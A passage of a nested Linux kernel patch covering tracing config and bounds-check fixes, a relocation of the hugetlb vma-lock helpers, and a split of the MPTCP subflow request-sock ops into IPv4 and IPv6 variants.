++	err = security_perf_event_open(&attr, PERF_SECURITY_OPEN);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/kernel/trace/Kconfig b/kernel/trace/Kconfig
+index e9e95c790b8ee..93d7249962833 100644
+--- a/kernel/trace/Kconfig
++++ b/kernel/trace/Kconfig
+@@ -375,6 +375,7 @@ config SCHED_TRACER
+ config HWLAT_TRACER
+ 	bool "Tracer to detect hardware latencies (like SMIs)"
+ 	select GENERIC_TRACER
++	select TRACER_MAX_TRACE
+ 	help
+ 	 This tracer, when enabled will create one or more kernel threads,
+ 	 depending on what the cpumask file is set to, which each thread
+@@ -410,6 +411,7 @@ config HWLAT_TRACER
+ config OSNOISE_TRACER
+ 	bool "OS Noise tracer"
+ 	select GENERIC_TRACER
++	select TRACER_MAX_TRACE
+ 	help
+ 	  In the context of high-performance computing (HPC), the Operating
+ 	  System Noise (osnoise) refers to the interference experienced by an
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 5cfc95a52bc37..3076af8dbf32e 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1421,6 +1421,7 @@ int tracing_snapshot_cond_disable(struct trace_array *tr)
+ 	return false;
+ }
+ EXPORT_SYMBOL_GPL(tracing_snapshot_cond_disable);
++#define free_snapshot(tr)	do { } while (0)
+ #endif /* CONFIG_TRACER_SNAPSHOT */
+ 
+ void tracer_tracing_off(struct trace_array *tr)
+@@ -1692,6 +1693,8 @@ static ssize_t trace_seq_to_buffer(struct trace_seq *s, void *buf, size_t cnt)
+ }
+ 
+ unsigned long __read_mostly	tracing_thresh;
++
++#ifdef CONFIG_TRACER_MAX_TRACE
+ static const struct file_operations tracing_max_lat_fops;
+ 
+ #ifdef LATENCY_FS_NOTIFY
+@@ -1748,18 +1751,14 @@ void latency_fsnotify(struct trace_array *tr)
+ 	irq_work_queue(&tr->fsnotify_irqwork);
+ }
+ 
+-#elif defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER)	\
+-	|| defined(CONFIG_OSNOISE_TRACER)
++#else /* !LATENCY_FS_NOTIFY */
+ 
+ #define trace_create_maxlat_file(tr, d_tracer)				\
+ 	trace_create_file("tracing_max_latency", TRACE_MODE_WRITE,	\
+ 			  d_tracer, &tr->max_latency, &tracing_max_lat_fops)
+ 
+-#else
+-#define trace_create_maxlat_file(tr, d_tracer)	 do { } while (0)
+ #endif
+ 
+-#ifdef CONFIG_TRACER_MAX_TRACE
+ /*
+  * Copy the new maximum trace into the separate maximum-trace
+  * structure. (this way the maximum trace is permanently saved,
+@@ -1834,14 +1833,15 @@ update_max_tr(struct trace_array *tr, struct task_struct *tsk, int cpu,
+ 		ring_buffer_record_off(tr->max_buffer.buffer);
+ 
+ #ifdef CONFIG_TRACER_SNAPSHOT
+-	if (tr->cond_snapshot && !tr->cond_snapshot->update(tr, cond_data))
+-		goto out_unlock;
++	if (tr->cond_snapshot && !tr->cond_snapshot->update(tr, cond_data)) {
++		arch_spin_unlock(&tr->max_lock);
++		return;
++	}
+ #endif
+ 	swap(tr->array_buffer.buffer, tr->max_buffer.buffer);
+ 
+ 	__update_max_tr(tr, tsk, cpu);
+ 
+- out_unlock:
+ 	arch_spin_unlock(&tr->max_lock);
+ }
+ 
+@@ -1888,6 +1888,7 @@ update_max_tr_single(struct trace_array *tr, struct task_struct *tsk, int cpu)
+ 	__update_max_tr(tr, tsk, cpu);
+ 	arch_spin_unlock(&tr->max_lock);
+ }
++
+ #endif /* CONFIG_TRACER_MAX_TRACE */
+ 
+ static int wait_on_pipe(struct trace_iterator *iter, int full)
+@@ -6572,7 +6573,7 @@ out:
+ 	return ret;
+ }
+ 
+-#if defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER)
++#ifdef CONFIG_TRACER_MAX_TRACE
+ 
+ static ssize_t
+ tracing_max_lat_read(struct file *filp, char __user *ubuf,
+@@ -6796,7 +6797,20 @@ waitagain:
+ 
+ 		ret = print_trace_line(iter);
+ 		if (ret == TRACE_TYPE_PARTIAL_LINE) {
+-			/* don't print partial lines */
++			/*
++			 * If one print_trace_line() fills entire trace_seq in one shot,
++			 * trace_seq_to_user() will returns -EBUSY because save_len == 0,
++			 * In this case, we need to consume it, otherwise, loop will peek
++			 * this event next time, resulting in an infinite loop.
++			 */
++			if (save_len == 0) {
++				iter->seq.full = 0;
++				trace_seq_puts(&iter->seq, "[LINE TOO BIG]\n");
++				trace_consume(iter);
++				break;
++			}
++
++			/* In other cases, don't print partial lines */
+ 			iter->seq.seq.len = save_len;
+ 			break;
+ 		}
+@@ -7587,7 +7601,7 @@ static const struct file_operations tracing_thresh_fops = {
+ 	.llseek		= generic_file_llseek,
+ };
+ 
+-#if defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER)
++#ifdef CONFIG_TRACER_MAX_TRACE
+ static const struct file_operations tracing_max_lat_fops = {
+ 	.open		= tracing_open_generic,
+ 	.read		= tracing_max_lat_read,
+@@ -9601,7 +9615,9 @@ init_tracer_tracefs(struct trace_array *tr, struct dentry *d_tracer)
+ 
+ 	create_trace_options_dir(tr);
+ 
++#ifdef CONFIG_TRACER_MAX_TRACE
+ 	trace_create_maxlat_file(tr, d_tracer);
++#endif
+ 
+ 	if (ftrace_create_function_files(tr, d_tracer))
+ 		MEM_FAIL(1, "Could not allocate function filter files");
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index d42e245071525..5581754d97628 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -308,8 +308,7 @@ struct trace_array {
+ 	struct array_buffer	max_buffer;
+ 	bool			allocated_snapshot;
+ #endif
+-#if defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER) \
+-	|| defined(CONFIG_OSNOISE_TRACER)
++#ifdef CONFIG_TRACER_MAX_TRACE
+ 	unsigned long		max_latency;
+ #ifdef CONFIG_FSNOTIFY
+ 	struct dentry		*d_max_latency;
+@@ -688,12 +687,11 @@ void update_max_tr(struct trace_array *tr, struct task_struct *tsk, int cpu,
+ 		   void *cond_data);
+ void update_max_tr_single(struct trace_array *tr,
+ 			  struct task_struct *tsk, int cpu);
+-#endif /* CONFIG_TRACER_MAX_TRACE */
+ 
+-#if (defined(CONFIG_TRACER_MAX_TRACE) || defined(CONFIG_HWLAT_TRACER) \
+-	|| defined(CONFIG_OSNOISE_TRACER)) && defined(CONFIG_FSNOTIFY)
++#ifdef CONFIG_FSNOTIFY
+ #define LATENCY_FS_NOTIFY
+ #endif
++#endif /* CONFIG_TRACER_MAX_TRACE */
+ 
+ #ifdef LATENCY_FS_NOTIFY
+ void latency_fsnotify(struct trace_array *tr);
+@@ -1956,17 +1954,30 @@ static __always_inline void trace_iterator_reset(struct trace_iterator *iter)
+ }
+ 
+ /* Check the name is good for event/group/fields */
+-static inline bool is_good_name(const char *name)
++static inline bool __is_good_name(const char *name, bool hash_ok)
+ {
+-	if (!isalpha(*name) && *name != '_')
++	if (!isalpha(*name) && *name != '_' && (!hash_ok || *name != '-'))
+ 		return false;
+ 	while (*++name != '\0') {
+-		if (!isalpha(*name) && !isdigit(*name) && *name != '_')
++		if (!isalpha(*name) && !isdigit(*name) && *name != '_' &&
++		    (!hash_ok || *name != '-'))
+ 			return false;
+ 	}
+ 	return true;
+ }
+ 
++/* Check the name is good for event/group/fields */
++static inline bool is_good_name(const char *name)
++{
++	return __is_good_name(name, false);
++}
++
++/* Check the name is good for system */
++static inline bool is_good_system_name(const char *name)
++{
++	return __is_good_name(name, true);
++}
++
+ /* Convert certain expected symbols into '_' when generating event names */
+ static inline void sanitize_event_name(char *name)
+ {
+diff --git a/kernel/trace/trace_eprobe.c b/kernel/trace/trace_eprobe.c
+index 352b65e2b9105..753fc536525d3 100644
+--- a/kernel/trace/trace_eprobe.c
++++ b/kernel/trace/trace_eprobe.c
+@@ -564,6 +564,9 @@ static void eprobe_trigger_func(struct event_trigger_data *data,
+ {
+ 	struct eprobe_data *edata = data->private_data;
+ 
++	if (unlikely(!rec))
++		return;
++
+ 	if (unlikely(!rec))
+ 		return;
+ 
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index b6e5724a9ea35..c6e406995c112 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -617,7 +617,7 @@ struct action_data {
+ 	 * event param, and is passed to the synthetic event
+ 	 * invocation.
+ 	 */
+-	unsigned int		var_ref_idx[TRACING_MAP_VARS_MAX];
++	unsigned int		var_ref_idx[SYNTH_FIELDS_MAX];
+ 	struct synth_event	*synth_event;
+ 	bool			use_trace_keyword;
+ 	char			*synth_event_name;
+@@ -2173,7 +2173,9 @@ static struct hist_field *create_var_ref(struct hist_trigger_data *hist_data,
+ 			return ref_field;
+ 		}
+ 	}
+-
++	/* Sanity check to avoid out-of-bound write on 'hist_data->var_refs' */
++	if (hist_data->n_var_refs >= TRACING_MAP_VARS_MAX)
++		return NULL;
+ 	ref_field = create_hist_field(var_field->hist_data, NULL, flags, NULL);
+ 	if (ref_field) {
+ 		if (init_var_ref(ref_field, var_field, system, event_name)) {
+@@ -3586,6 +3588,7 @@ static int parse_action_params(struct trace_array *tr, char *params,
+ 	while (params) {
+ 		if (data->n_params >= SYNTH_FIELDS_MAX) {
+ 			hist_err(tr, HIST_ERR_TOO_MANY_PARAMS, 0);
++			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 
+@@ -3922,6 +3925,10 @@ static int trace_action_create(struct hist_trigger_data *hist_data,
+ 
+ 	lockdep_assert_held(&event_mutex);
+ 
++	/* Sanity check to avoid out-of-bound write on 'data->var_ref_idx' */
++	if (data->n_params > SYNTH_FIELDS_MAX)
++		return -EINVAL;
++
+ 	if (data->use_trace_keyword)
+ 		synth_event_name = data->synth_event_name;
+ 	else
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index c3b582d19b620..67592eed0be8d 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -1282,12 +1282,12 @@ static int __create_synth_event(const char *name, const char *raw_fields)
+ 				goto err_free_arg;
+ 			}
+ 
+-			fields[n_fields++] = field;
+ 			if (n_fields == SYNTH_FIELDS_MAX) {
+ 				synth_err(SYNTH_ERR_TOO_MANY_FIELDS, 0);
+ 				ret = -EINVAL;
+ 				goto err_free_arg;
+ 			}
++			fields[n_fields++] = field;
+ 
+ 			n_fields_this_loop++;
+ 		}
+diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
+index 36dff277de464..bb2f95d7175c2 100644
+--- a/kernel/trace/trace_probe.c
++++ b/kernel/trace/trace_probe.c
+@@ -246,7 +246,7 @@ int traceprobe_parse_event_name(const char **pevent, const char **pgroup,
+ 			return -EINVAL;
+ 		}
+ 		strlcpy(buf, event, slash - event + 1);
+-		if (!is_good_name(buf)) {
++		if (!is_good_system_name(buf)) {
+ 			trace_probe_log_err(offset, BAD_GROUP_NAME);
+ 			return -EINVAL;
+ 		}
+diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
+index 3638b3424be53..12dfe6691dd52 100644
+--- a/lib/Kconfig.debug
++++ b/lib/Kconfig.debug
+@@ -2092,6 +2092,7 @@ config TEST_MIN_HEAP
+ config TEST_SORT
+ 	tristate "Array-based sort test" if !KUNIT_ALL_TESTS
+ 	depends on KUNIT
++	select STACKTRACE if ARCH_CORRECT_STACKTRACE_ON_KRETPROBE
+ 	default KUNIT_ALL_TESTS
+ 	help
+ 	  This option enables the self-test function of 'sort()' at boot,
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index e36ca75311a5c..9c251faeb6f59 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -255,6 +255,152 @@ static inline struct hugepage_subpool *subpool_vma(struct vm_area_struct *vma)
+ 	return subpool_inode(file_inode(vma->vm_file));
+ }
+ 
++/*
++ * hugetlb vma_lock helper routines
++ */
++static bool __vma_shareable_lock(struct vm_area_struct *vma)
++{
++	return vma->vm_flags & (VM_MAYSHARE | VM_SHARED) &&
++		vma->vm_private_data;
++}
++
++void hugetlb_vma_lock_read(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		down_read(&vma_lock->rw_sema);
++	}
++}
++
++void hugetlb_vma_unlock_read(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		up_read(&vma_lock->rw_sema);
++	}
++}
++
++void hugetlb_vma_lock_write(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		down_write(&vma_lock->rw_sema);
++	}
++}
++
++void hugetlb_vma_unlock_write(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		up_write(&vma_lock->rw_sema);
++	}
++}
++
++int hugetlb_vma_trylock_write(struct vm_area_struct *vma)
++{
++	struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++	if (!__vma_shareable_lock(vma))
++		return 1;
++
++	return down_write_trylock(&vma_lock->rw_sema);
++}
++
++void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		lockdep_assert_held(&vma_lock->rw_sema);
++	}
++}
++
++void hugetlb_vma_lock_release(struct kref *kref)
++{
++	struct hugetlb_vma_lock *vma_lock = container_of(kref,
++			struct hugetlb_vma_lock, refs);
++
++	kfree(vma_lock);
++}
++
++static void __hugetlb_vma_unlock_write_put(struct hugetlb_vma_lock *vma_lock)
++{
++	struct vm_area_struct *vma = vma_lock->vma;
++
++	/*
++	 * vma_lock structure may or not be released as a result of put,
++	 * it certainly will no longer be attached to vma so clear pointer.
++	 * Semaphore synchronizes access to vma_lock->vma field.
++	 */
++	vma_lock->vma = NULL;
++	vma->vm_private_data = NULL;
++	up_write(&vma_lock->rw_sema);
++	kref_put(&vma_lock->refs, hugetlb_vma_lock_release);
++}
++
++static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma)
++{
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		__hugetlb_vma_unlock_write_put(vma_lock);
++	}
++}
++
++static void hugetlb_vma_lock_free(struct vm_area_struct *vma)
++{
++	/*
++	 * Only present in sharable vmas.
++	 */
++	if (!vma || !__vma_shareable_lock(vma))
++		return;
++
++	if (vma->vm_private_data) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
++
++		down_write(&vma_lock->rw_sema);
++		__hugetlb_vma_unlock_write_put(vma_lock);
++	}
++}
++
++static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma)
++{
++	struct hugetlb_vma_lock *vma_lock;
++
++	/* Only establish in (flags) sharable vmas */
++	if (!vma || !(vma->vm_flags & VM_MAYSHARE))
++		return;
++
++	/* Should never get here with non-NULL vm_private_data */
++	if (vma->vm_private_data)
++		return;
++
++	vma_lock = kmalloc(sizeof(*vma_lock), GFP_KERNEL);
++	if (!vma_lock) {
++		/*
++		 * If we can not allocate structure, then vma can not
++		 * participate in pmd sharing.  This is only a possible
++		 * performance enhancement and memory saving issue.
++		 * However, the lock is also used to synchronize page
++		 * faults with truncation.  If the lock is not present,
++		 * unlikely races could leave pages in a file past i_size
++		 * until the file is removed.  Warn in the unlikely case of
++		 * allocation failure.
++		 */
++		pr_warn_once("HugeTLB: unable to allocate vma specific lock\n");
++		return;
++	}
++
++	kref_init(&vma_lock->refs);
++	init_rwsem(&vma_lock->rw_sema);
++	vma_lock->vma = vma;
++	vma->vm_private_data = vma_lock;
++}
++
+ /* Helper that removes a struct file_region from the resv_map cache and returns
+  * it for use.
+  */
+@@ -6557,7 +6703,8 @@ bool hugetlb_reserve_pages(struct inode *inode,
+ 	}
+ 
+ 	/*
+-	 * vma specific semaphore used for pmd sharing synchronization
++	 * vma specific semaphore used for pmd sharing and fault/truncation
++	 * synchronization
+ 	 */
+ 	hugetlb_vma_lock_alloc(vma);
+ 
+@@ -6813,149 +6960,6 @@ void adjust_range_if_pmd_sharing_possible(struct vm_area_struct *vma,
+ 		*end = ALIGN(*end, PUD_SIZE);
+ }
+ 
+-static bool __vma_shareable_flags_pmd(struct vm_area_struct *vma)
+-{
+-	return vma->vm_flags & (VM_MAYSHARE | VM_SHARED) &&
+-		vma->vm_private_data;
+-}
+-
+-void hugetlb_vma_lock_read(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		down_read(&vma_lock->rw_sema);
+-	}
+-}
+-
+-void hugetlb_vma_unlock_read(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		up_read(&vma_lock->rw_sema);
+-	}
+-}
+-
+-void hugetlb_vma_lock_write(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		down_write(&vma_lock->rw_sema);
+-	}
+-}
+-
+-void hugetlb_vma_unlock_write(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		up_write(&vma_lock->rw_sema);
+-	}
+-}
+-
+-int hugetlb_vma_trylock_write(struct vm_area_struct *vma)
+-{
+-	struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-	if (!__vma_shareable_flags_pmd(vma))
+-		return 1;
+-
+-	return down_write_trylock(&vma_lock->rw_sema);
+-}
+-
+-void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		lockdep_assert_held(&vma_lock->rw_sema);
+-	}
+-}
+-
+-void hugetlb_vma_lock_release(struct kref *kref)
+-{
+-	struct hugetlb_vma_lock *vma_lock = container_of(kref,
+-			struct hugetlb_vma_lock, refs);
+-
+-	kfree(vma_lock);
+-}
+-
+-static void __hugetlb_vma_unlock_write_put(struct hugetlb_vma_lock *vma_lock)
+-{
+-	struct vm_area_struct *vma = vma_lock->vma;
+-
+-	/*
+-	 * vma_lock structure may or not be released as a result of put,
+-	 * it certainly will no longer be attached to vma so clear pointer.
+-	 * Semaphore synchronizes access to vma_lock->vma field.
+-	 */
+-	vma_lock->vma = NULL;
+-	vma->vm_private_data = NULL;
+-	up_write(&vma_lock->rw_sema);
+-	kref_put(&vma_lock->refs, hugetlb_vma_lock_release);
+-}
+-
+-static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma)
+-{
+-	if (__vma_shareable_flags_pmd(vma)) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		__hugetlb_vma_unlock_write_put(vma_lock);
+-	}
+-}
+-
+-static void hugetlb_vma_lock_free(struct vm_area_struct *vma)
+-{
+-	/*
+-	 * Only present in sharable vmas.
+-	 */
+-	if (!vma || !__vma_shareable_flags_pmd(vma))
+-		return;
+-
+-	if (vma->vm_private_data) {
+-		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+-
+-		down_write(&vma_lock->rw_sema);
+-		__hugetlb_vma_unlock_write_put(vma_lock);
+-	}
+-}
+-
+-static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma)
+-{
+-	struct hugetlb_vma_lock *vma_lock;
+-
+-	/* Only establish in (flags) sharable vmas */
+-	if (!vma || !(vma->vm_flags & VM_MAYSHARE))
+-		return;
+-
+-	/* Should never get here with non-NULL vm_private_data */
+-	if (vma->vm_private_data)
+-		return;
+-
+-	vma_lock = kmalloc(sizeof(*vma_lock), GFP_KERNEL);
+-	if (!vma_lock) {
+-		/*
+-		 * If we can not allocate structure, then vma can not
+-		 * participate in pmd sharing.  This is only a possible
+-		 * performance enhancement and memory saving issue.
+-		 * However, the lock is also used to synchronize page
+-		 * faults with truncation.  If the lock is not present,
+-		 * unlikely races could leave pages in a file past i_size
+-		 * until the file is removed.  Warn in the unlikely case of
+-		 * allocation failure.
+-		 */
+-		pr_warn_once("HugeTLB: unable to allocate vma specific lock\n");
+-		return;
+-	}
+-
+-	kref_init(&vma_lock->refs);
+-	init_rwsem(&vma_lock->rw_sema);
+-	vma_lock->vma = vma;
+-	vma->vm_private_data = vma_lock;
+-}
+-
+ /*
+  * Search for a shareable pmd page for hugetlb. In any case calls pmd_alloc()
+  * and returns the corresponding pte. While this is not necessary for the
+@@ -7044,47 +7048,6 @@ int huge_pmd_unshare(struct mm_struct *mm, struct vm_area_struct *vma,
+ 
+ #else /* !CONFIG_ARCH_WANT_HUGE_PMD_SHARE */
+ 
+-void hugetlb_vma_lock_read(struct vm_area_struct *vma)
+-{
+-}
+-
+-void hugetlb_vma_unlock_read(struct vm_area_struct *vma)
+-{
+-}
+-
+-void hugetlb_vma_lock_write(struct vm_area_struct *vma)
+-{
+-}
+-
+-void hugetlb_vma_unlock_write(struct vm_area_struct *vma)
+-{
+-}
+-
+-int hugetlb_vma_trylock_write(struct vm_area_struct *vma)
+-{
+-	return 1;
+-}
+-
+-void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
+-{
+-}
+-
+-void hugetlb_vma_lock_release(struct kref *kref)
+-{
+-}
+-
+-static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma)
+-{
+-}
+-
+-static void hugetlb_vma_lock_free(struct vm_area_struct *vma)
+-{
+-}
+-
+-static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma)
+-{
+-}
+-
+ pte_t *huge_pmd_share(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		      unsigned long addr, pud_t *pud)
+ {
+diff --git a/net/ipv4/syncookies.c b/net/ipv4/syncookies.c
+index 942d2dfa11151..26fb97d1d4d9a 100644
+--- a/net/ipv4/syncookies.c
++++ b/net/ipv4/syncookies.c
+@@ -288,12 +288,11 @@ struct request_sock *cookie_tcp_reqsk_alloc(const struct request_sock_ops *ops,
+ 	struct tcp_request_sock *treq;
+ 	struct request_sock *req;
+ 
+-#ifdef CONFIG_MPTCP
+ 	if (sk_is_mptcp(sk))
+-		ops = &mptcp_subflow_request_sock_ops;
+-#endif
++		req = mptcp_subflow_reqsk_alloc(ops, sk, false);
++	else
++		req = inet_reqsk_alloc(ops, sk, false);
+ 
+-	req = inet_reqsk_alloc(ops, sk, false);
+ 	if (!req)
+ 		return NULL;
+ 
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 9e82250cbb703..0430415357ba3 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -156,6 +156,7 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (addr_val.addr.id == 0 || !(addr_val.flags & MPTCP_PM_ADDR_FLAG_SIGNAL)) {
+ 		GENL_SET_ERR_MSG(info, "invalid addr id or flags");
++		err = -EINVAL;
+ 		goto announce_err;
+ 	}
+ 
+@@ -282,6 +283,7 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (addr_l.id == 0) {
+ 		NL_SET_ERR_MSG_ATTR(info->extack, laddr, "missing local addr id");
++		err = -EINVAL;
+ 		goto create_err;
+ 	}
+ 
+@@ -395,11 +397,13 @@ int mptcp_nl_cmd_sf_destroy(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (addr_l.family != addr_r.family) {
+ 		GENL_SET_ERR_MSG(info, "address families do not match");
++		err = -EINVAL;
+ 		goto destroy_err;
+ 	}
+ 
+ 	if (!addr_l.port || !addr_r.port) {
+ 		GENL_SET_ERR_MSG(info, "missing local or remote port");
++		err = -EINVAL;
+ 		goto destroy_err;
+ 	}
+ 
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 2159b5f9988f8..613f515fedf0a 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -45,7 +45,6 @@ static void subflow_req_destructor(struct request_sock *req)
+ 		sock_put((struct sock *)subflow_req->msk);
+ 
+ 	mptcp_token_destroy_request(req);
+-	tcp_request_sock_ops.destructor(req);
+ }
+ 
+ static void subflow_generate_hmac(u64 key1, u64 key2, u32 nonce1, u32 nonce2,
+@@ -529,7 +528,7 @@ static int subflow_v6_rebuild_header(struct sock *sk)
+ }
+ #endif
+ 
+-struct request_sock_ops mptcp_subflow_request_sock_ops;
++static struct request_sock_ops mptcp_subflow_v4_request_sock_ops __ro_after_init;
+ static struct tcp_request_sock_ops subflow_request_sock_ipv4_ops __ro_after_init;
+ 
+ static int subflow_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+@@ -542,7 +541,7 @@ static int subflow_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (skb_rtable(skb)->rt_flags & (RTCF_BROADCAST | RTCF_MULTICAST))
+ 		goto drop;
+ 
+-	return tcp_conn_request(&mptcp_subflow_request_sock_ops,
++	return tcp_conn_request(&mptcp_subflow_v4_request_sock_ops,
+ 				&subflow_request_sock_ipv4_ops,
+ 				sk, skb);
+ drop:
+@@ -550,7 +549,14 @@ drop:
+ 	return 0;
+ }
+ 
++static void subflow_v4_req_destructor(struct request_sock *req)
++{
++	subflow_req_destructor(req);
++	tcp_request_sock_ops.destructor(req);
++}
++
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
++static struct request_sock_ops mptcp_subflow_v6_request_sock_ops __ro_after_init;
+ static struct tcp_request_sock_ops subflow_request_sock_ipv6_ops __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6_specific __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6m_specific __ro_after_init;
+@@ -573,15 +579,36 @@ static int subflow_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ 		return 0;
+ 	}
+ 
+-	return tcp_conn_request(&mptcp_subflow_request_sock_ops,
++	return tcp_conn_request(&mptcp_subflow_v6_request_sock_ops,
+ 				&subflow_request_sock_ipv6_ops, sk, skb);
+ 
+ drop:
+ 	tcp_listendrop(sk);
+ 	return 0; /* don't send reset */
+ }
++
++static void subflow_v6_req_destructor(struct request_sock *req)
++{
++	subflow_req_destructor(req);
++	tcp6_request_sock_ops.destructor(req);
++}
++#endif
++
++struct request_sock *mptcp_subflow_reqsk_alloc(const struct request_sock_ops *ops,
++					       struct sock *sk_listener,
++					       bool attach_listener)
++{
++	if (ops->family == AF_INET)
++		ops = &mptcp_subflow_v4_request_sock_ops;
++#if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	else if (ops->family == AF_INET6)
++		ops = &mptcp_subflow_v6_request_sock_ops;
+ #endif
+ 
++	return inet_reqsk_alloc(ops, sk_listener, attach_listener);
++}
++EXPORT_SYMBOL(mptcp_subflow_reqsk_alloc);
++
+ /* validate hmac received in third ACK */
+ static bool subflow_hmac_valid(const struct request_sock *req,
+ 			       const struct mptcp_options_received *mp_opt)
+@@ -1904,7 +1931,6 @@ static struct tcp_ulp_ops subflow_ulp_ops __read_mostly = {
+ static int subflow_ops_init(struct request_sock_ops *subflow_ops)
+ {
+ 	subflow_ops->obj_size = sizeof(struct mptcp_subflow_request_sock);
+-	subflow_ops->slab_name = "request_sock_subflow";
+ 
+ 	subflow_ops->slab = kmem_cache_create(subflow_ops->slab_name,
+ 					      subflow_ops->obj_size, 0,
+@@ -1914,16 +1940,17 @@ static int subflow_ops_init(struct request_sock_ops *subflow_ops)
+ 	if (!subflow_ops->slab)
+ 		return -ENOMEM;
+ 
+-	subflow_ops->destructor = subflow_req_destructor;
+-
+ 	return 0;
+ }
+ 
+ void __init mptcp_subflow_init(void)
+ {
+-	mptcp_subflow_request_sock_ops = tcp_request_sock_ops;
+-	if (subflow_ops_init(&mptcp_subflow_request_sock_ops) != 0)
+-		panic("MPTCP: failed to init subflow request sock ops\n");
++	mptcp_subflow_v4_request_sock_ops = tcp_request_sock_ops;
++	mptcp_subflow_v4_request_sock_ops.slab_name = "request_sock_subflow_v4";
++	mptcp_subflow_v4_request_sock_ops.destructor = subflow_v4_req_destructor;
++
++	if (subflow_ops_init(&mptcp_subflow_v4_request_sock_ops) != 0)
++		panic("MPTCP: failed to init subflow v4 request sock ops\n");
+ 
+ 	subflow_request_sock_ipv4_ops = tcp_request_sock_ipv4_ops;
+ 	subflow_request_sock_ipv4_ops.route_req = subflow_v4_route_req;
+@@ -1938,6 +1965,20 @@ void __init mptcp_subflow_init(void)
+ 	tcp_prot_override.release_cb = tcp_release_cb_override;
+ 
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	/* In struct mptcp_subflow_request_sock, we assume the TCP request sock
++	 * structures for v4 and v6 have the same size. It should not changed in
++	 * the future but better to make sure to be warned if it is no longer
++	 * the case.
++	 */
++	BUILD_BUG_ON(sizeof(struct tcp_request_sock) != sizeof(struct tcp6_request_sock));
++
++	mptcp_subflow_v6_request_sock_ops = tcp6_request_sock_ops;
++	mptcp_subflow_v6_request_sock_ops.slab_name = "request_sock_subflow_v6";
++	mptcp_subflow_v6_request_sock_ops.destructor = subflow_v6_req_destructor;
++
++	if (subflow_ops_init(&mptcp_subflow_v6_request_sock_ops) != 0)
